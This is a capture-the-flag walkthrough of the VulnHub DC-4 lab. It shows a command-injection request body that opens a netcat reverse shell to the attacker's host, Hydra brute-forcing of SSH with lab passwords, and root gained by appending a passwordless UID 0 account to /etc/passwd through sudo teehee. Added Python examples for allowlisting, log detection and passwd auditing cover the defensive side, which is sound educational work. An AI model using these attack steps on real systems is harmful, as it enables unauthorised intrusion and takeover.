DC-4 Walkthrough
Description from Vulnhub:
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
Scanning
I started with the good old port scanning phase, which revealed 2 open ports.
root :: ~ » nmap -A -sC -sV -p- 192.168.42.160
Nmap scan report for dc-4 (192.168.42.160)
Host is up (0.00024s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:01:36:36 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I didn’t find anything on the webserver: no directories, no files, nothing. Since there was nothing to go on, I decided to brute-force the login page. For this, I used my Windows machine because it’s a little bit faster. By the way, I used the rockyou-20.txt wordlist from the SecLists repository.
I managed to find a correct username and password combination. After I logged in, I was presented with a simple page, where we can run limited commands. As it turns out, it wasn’t limited at all…
I captured the request in Burp Suite and tried a simple command injection attack. It worked! I was able to print out the /etc/passwd file.
Executing arbitrary commands using Burp Suite.
Getting a shell
Using the following request body, I was able to get a connection back.
radio=ls+-l|nc -e /bin/bash 192.168.43.2 9898&submit=Run
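The injection works because the value of the radio parameter ends up in a shell. The page does not show the server-side code, so the following is an added example (not the DC-4 box's own code, and the menu entries are constructed) of how such a "limited commands" handler should be written: the parameter is a menu key looked up in an allowlist, and the stored argv runs with no shell, so a `|`, `;` or `$(...)` glued onto a valid entry is rejected as a whole.

```python
"""Allowlist dispatcher for a "run a limited command" form.

Added example, not the DC-4 box's own code. It assumes the form body
looks like the captured request (radio=<choice>&submit=Run) and that the
page only ever meant to offer a fixed menu. The fix is to treat the
parameter as a menu key rather than a shell string: look it up and run
the stored argv with no shell, so '|', ';', '&&' and '$(...)' are never
interpreted.
"""
import subprocess
from urllib.parse import parse_qs

# Menu key -> argv. Constructed allowlist; the real page's menu is unknown.
ALLOWED_COMMANDS = {
    "ls -l": ["ls", "-l"],
    "df -h": ["df", "-h"],
    "uptime": ["uptime"],
}


def resolve_command(body: str) -> list:
    """Map a raw form body to an argv list, or raise ValueError.

    Only an exact allowlist key is accepted, so a valid menu entry with
    '|cmd', ';cmd' or '$(cmd)' glued on is rejected as a whole.
    """
    params = parse_qs(body, keep_blank_values=True)
    choices = params.get("radio", [])
    if len(choices) != 1:
        raise ValueError("expected exactly one 'radio' value")
    choice = choices[0]
    if choice not in ALLOWED_COMMANDS:
        raise ValueError(f"command not permitted: {choice!r}")
    return list(ALLOWED_COMMANDS[choice])


def is_rejected(body: str) -> bool:
    """True when the body would be refused (useful for alerting)."""
    try:
        resolve_command(body)
    except ValueError:
        return True
    return False


def run_command(body: str, timeout: float = 5.0) -> str:
    """Resolve and execute the chosen command without a shell."""
    argv = resolve_command(body)
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    print(run_command("radio=uptime&submit=Run"))
    # Constructed body shaped like the injected request above, with a
    # harmless 'id' in place of the listener: the allowlist refuses it.
    print(is_rejected("radio=ls+-l%7Cid&submit=Run"))  # True
```

Because the lookup is an exact match rather than a blacklist of metacharacters, there is no escaping logic to get wrong; anything that is not literally one of the menu keys is refused, and the refusal itself is a useful signal to log.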
After that, I did my usual (and very basic) enumeration, which consists of looking into interesting directories and searching for low-hanging fruit. In Jim’s home directory, I found a backups directory which contained an old-passwords.bak file. I quickly started an HTTP server using the python -m SimpleHTTPServer command. It's easy when Python is installed.
cd backups
ls
old-passwords.bak
python -m SimpleHTTPServer
A quick wget and the file is mine.
root :: ~/Downloads » wget 192.168.43.160:8000/old-passwords.bak
http://192.168.43.160:8000/old-passwords.bak
Connecting to 192.168.43.160:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2047 (2.0K) [application/x-trash]
Saving to: ‘old-passwords.bak’
old-passwords.bak 100%[==============================================>] 2.00K --.-KB/s in 0s
(67.3 MB/s) - ‘old-passwords.bak’ saved [2047/2047]
root :: ~/Downloads »
Brute-forcing with Hydra
We’ve got our password file. I also created a users.txt file with all three possible usernames, because this way it’s easier to check the passwords against all users.
root :: ~ » hydra -L ~/Downloads/users.txt -P ~/Downloads/old-passwords.bak ssh://192.168.43.160
Hydra v9.1-dev (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.43.160:22/
[STATUS] 99.00 tries/min, 99 tries in 00:01h, 660 to do in 00:07h, 16 active
[22][ssh] host: 192.168.43.160 login: jim password: jibril04
[STATUS] 106.00 tries/min, 318 tries in 00:03h, 441 to do in 00:05h, 16 active
[STATUS] 91.29 tries/min, 639 tries in 00:07h, 120 to do in 00:02h, 16 active
[STATUS] 92.38 tries/min, 739 tries in 00:08h, 20 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid passwords found
Alright… Jim didn’t change his password, which is good for us.
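A run like the one above (756 tries against three users in a few minutes) is loud in sshd's log, and the interesting signal is the successful login that follows the burst from the same source. The script below is an added example, not part of the walkthrough: it parses constructed auth.log lines shaped like OpenSSH's default Debian logging, finds sources that exceed a failure threshold inside a sliding window, and reports any account that then logged in from that source. The year is assumed because syslog timestamps do not carry one.

```python
"""Spot a password-guessing burst in sshd logs and a login that follows it.

Added example, not from the walkthrough. It assumes OpenSSH's default
syslog lines on Debian (auth.log). SAMPLE_LOG is constructed to resemble
what a hydra run against jim, charles and sam leaves behind; the year
passed to parse_ts is an assumption because syslog omits it.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

# Constructed sample: 11 failures in 14 seconds from one source, then a
# successful login; a single unrelated failure from another host.
SAMPLE_LOG = [
    "Apr  7 10:00:01 dc-4 sshd[1201]: Failed password for jim from 192.168.43.2 port 40001 ssh2",
    "Apr  7 10:00:02 dc-4 sshd[1202]: Failed password for charles from 192.168.43.2 port 40002 ssh2",
    "Apr  7 10:00:03 dc-4 sshd[1203]: Failed password for sam from 192.168.43.2 port 40003 ssh2",
    "Apr  7 10:00:05 dc-4 sshd[1204]: Failed password for jim from 192.168.43.2 port 40004 ssh2",
    "Apr  7 10:00:06 dc-4 sshd[1205]: Failed password for charles from 192.168.43.2 port 40005 ssh2",
    "Apr  7 10:00:07 dc-4 sshd[1206]: Failed password for sam from 192.168.43.2 port 40006 ssh2",
    "Apr  7 10:00:09 dc-4 sshd[1207]: Failed password for jim from 192.168.43.2 port 40007 ssh2",
    "Apr  7 10:00:10 dc-4 sshd[1208]: Failed password for charles from 192.168.43.2 port 40008 ssh2",
    "Apr  7 10:00:11 dc-4 sshd[1209]: Failed password for sam from 192.168.43.2 port 40009 ssh2",
    "Apr  7 10:00:13 dc-4 sshd[1210]: Failed password for jim from 192.168.43.2 port 40010 ssh2",
    "Apr  7 10:00:14 dc-4 sshd[1211]: Failed password for charles from 192.168.43.2 port 40011 ssh2",
    "Apr  7 10:00:20 dc-4 sshd[1212]: Accepted password for jim from 192.168.43.2 port 40012 ssh2",
    "Apr  7 10:05:00 dc-4 sshd[1300]: Failed password for jim from 10.0.0.5 port 51000 ssh2",
    "Apr  7 10:05:04 dc-4 sshd[1301]: Accepted password for jim from 10.0.0.5 port 51000 ssh2",
]


def parse_ts(stamp: str, year: int = 2019) -> datetime:
    """Syslog stamp -> datetime; the year is not in the log, so it is supplied."""
    stamp = re.sub(r"\s+", " ", stamp)
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length window."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: finding} for sources with >= threshold failures in window."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        event = (parse_ts(m["ts"]), m["user"])
        (failures if m["result"] == "Failed" else successes)[m["ip"]].append(event)
    findings = {}
    for ip, events in failures.items():
        peak = max_in_window([t for t, _ in events], window)
        if peak < threshold:
            continue
        first_failure = min(t for t, _ in events)
        # A success from the same source after the burst is the high-value alert.
        later_logins = sorted(
            (t, u) for t, u in successes.get(ip, ()) if t >= first_failure
        )
        findings[ip] = {
            "peak_failures_in_window": peak,
            "users_tried": sorted({u for _, u in events}),
            "logins_after_burst": [u for _, u in later_logins],
        }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

The threshold and window are deliberately parameters: hydra's 16 parallel tasks produce roughly 100 tries a minute here, so a one-minute window with a threshold of 10 catches it easily, while the lone failure from the second host stays below the bar.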
Privilege Escalation
I found a shell script with the SUID bit set, but it was a dead end since Jim is not in the sudoers file. There was another file in Jim’s home directory called mbox, which indicated that there might be other emails on the box. Sure enough, I found one in the /var/mail directory.
jim@sagemcom:/var/mail$ cat jim
From charles@dc-4
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4;
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
Yess… Another password! As you can see, the sender is Charles, so the password is probably his.
I continued the enumeration as Charles and found out that he can execute the /usr/bin/teehee command as root without a password.
charles@sagemcom:/var/mail$ sudo -l
Matching Defaults entries for charles on sagemcom:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on sagemcom:
(root) NOPASSWD: /usr/bin/teehee
Root Access
I admit I’m not familiar with this program. I ran teehee --help to find out more about it. Unfortunately, the manpage isn’t available on the box.
jim@sagemcom:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
What we can do with this program is append the standard input to a file. You could also overwrite the whole file, but I decided to be “stealthy” and simply add a new user with root privileges to the /etc/passwd file. Obviously, without a password, for easier access. After that, just switch to that user and you’re root! Just like that!
charles@sagemcom:~$ sudo teehee -a /etc/passwd
infosecadventures::0:0:root:/root:/bin/bash
infosecadventures::0:0:root:/root:/bin/bash
^C
charles@sagemcom:~$ su infosecadventures
root@sagemcom:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@sagemcom:~#
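The appended line is exactly the kind of change a periodic integrity check should catch: a second UID 0 account, with an empty password field, that the package manager never created. The script below is an added example, not from the walkthrough. It parses /etc/passwd as text and flags extra UID 0 entries, empty password fields, duplicate user names and malformed lines; SAMPLE_PASSWD is constructed, with its last line mirroring the entry appended above.

```python
"""Audit /etc/passwd for the kind of change teehee -a left behind.

Added example, not from the walkthrough. It reads the file as text and
flags extra UID 0 accounts, empty password fields, duplicate user names
and malformed lines. SAMPLE_PASSWD is constructed; the last line mirrors
the entry appended above.
"""
from collections import Counter

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:,,,:/home/jim:/bin/bash
charles:x:1002:1002:,,,:/home/charles:/bin/bash
infosecadventures::0:0:root:/root:/bin/bash
"""


def parse_passwd(text):
    """Return (entries, problems): entries are dicts, problems are strings."""
    entries, problems = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            problems.append(f"line {lineno}: expected 7 fields, got {len(fields)}")
            continue
        name, password, uid, gid, gecos, home, shell = fields
        try:
            uid, gid = int(uid), int(gid)
        except ValueError:
            problems.append(f"line {lineno}: non-numeric uid/gid for {name!r}")
            continue
        entries.append({"line": lineno, "name": name, "password": password,
                        "uid": uid, "gid": gid, "home": home, "shell": shell})
    return entries, problems


def audit_passwd(text):
    """Return a list of findings; an empty list means nothing suspicious."""
    entries, findings = parse_passwd(text)
    for e in entries:
        # Any UID 0 besides root is a second superuser account.
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID 0 account {e['name']!r}")
        # An empty second field means no password is required at all
        # ('x' would defer to /etc/shadow, '*' or '!' would lock the account).
        if e["password"] == "":
            findings.append(f"line {e['line']}: empty password field for {e['name']!r}")
    for name, count in Counter(e["name"] for e in entries).items():
        if count > 1:
            findings.append(f"user name {name!r} appears {count} times")
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit against a real file (default: the live /etc/passwd)."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Because teehee ran as root, the file's owner, mode and location look perfectly normal afterwards, so a permissions check alone would pass; comparing the parsed contents against a known-good baseline (or the package manager's record) is what surfaces the extra line.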
The Flag
Finally, the most important thing is to print out the root flag! 😄
root@sagemcom:~# cat flag.txt
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
I had to remove the “Well Done” ASCII art because Medium messed it up…
Before You Go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! + Feedback is always welcome! 🙏